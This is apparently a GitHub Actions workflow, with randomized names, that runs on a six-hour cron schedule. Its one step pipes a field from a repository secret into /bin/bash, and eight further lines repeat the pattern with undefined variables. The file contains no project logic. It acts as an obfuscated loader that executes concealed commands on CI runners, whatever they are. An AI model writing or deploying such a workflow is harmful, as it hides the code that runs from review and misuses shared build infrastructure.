name: bishasx
on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bishasx
        env:
          kkx08: ${{ secrets.kkx08 }}
        run: |
          echo $kkx08 | jq -r .wnrde64652 | /bin/bash
          echo $vps31775 | jq -r .zgh83 | /bin/bash
          echo $ptrei6 | jq -r .ssqy5498 | /bin/bash
          echo $kls780 | jq -r .cl35 | /bin/bash
          echo $xjnn27 | jq -r .avra01 | /bin/bash
          echo $nw37548 | jq -r .l4796 | /bin/bash
          echo $dxbq55 | jq -r .j23978 | /bin/bash
          echo $juck94129 | jq -r .lzc5 | /bin/bash
          echo $gaq7 | jq -r .niec8760 | /bin/bash

